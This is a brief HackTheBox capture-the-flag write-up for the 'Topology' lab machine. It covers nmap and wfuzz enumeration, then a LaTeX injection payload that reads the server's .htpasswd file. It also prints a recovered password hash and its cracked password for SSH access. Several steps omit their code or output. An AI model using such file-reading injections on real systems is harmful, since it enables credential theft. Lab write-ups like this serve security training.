Tolopogy | HTB Wreiteup | Aayush Agrawal
Establishing the VPN Connection
Download the VPN connection file from HTB, after selecting the desired server (make sure no machines are active on your account at this point).
I use OpenVPN so in the terminal type the command, openvpn <address_for_the_.ovpn_file>
Note: Command to install OpenVPN in case you do not have it already: sudo apt-get install openvpn
It should set up a VPN connection between your host machine and the HTB server, and a small lock icon with the IP Address for the connection should pop up in the top-right notification section of your Kali system. Try running the command as the root user, in case the normal user account does not get a successful conn
Now proceed to search for the machine, using the search parameter machine: topology
in our case on the app.hackthebox.com site. Open the machine information page, and click on the Join Machine button.
Running an Nmap Scan
On entering the IP Address for the machine, we are welcomed with the above webpage, so we will look for open ports through an Nmap scan.
nmap -A -sV 10.10.11.217
Open Ports: 22, 80
Adding IP to /etc/hosts
Wfuzz for Directory Search
wfuzz -c -u 'http://topology.htb/' -H 'http://FUZZ.topology.htb/' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Command to install seclists: sudo apt install seclists
Directory Review
Looking Up Exploit for Latex Software
Injecting the above code into /equation.php input box,
Output:
Getting htpasswd for root directory from Apache vulnerability
Apache version is 2.4.41
Ref. Link: stackoverflow.com/questions/37545711/htpass..
command injected: $\lstinputlisting{/var/www/dev/.htpasswd}$
Output:
Output: vdaisley:$apr1!1ONUB/S2$58eeNVirnRDB5zAIzIxTY0
Store the output in a .txt file and run against john as,
hashcat analysis for the hash file,
we get the decrypted password: calculus20
We can get ssh login for the user vdaisley:
We got the user flag, and root flag. :D
Reference Link: https://techyrick.com/topology-htb-walkthrough/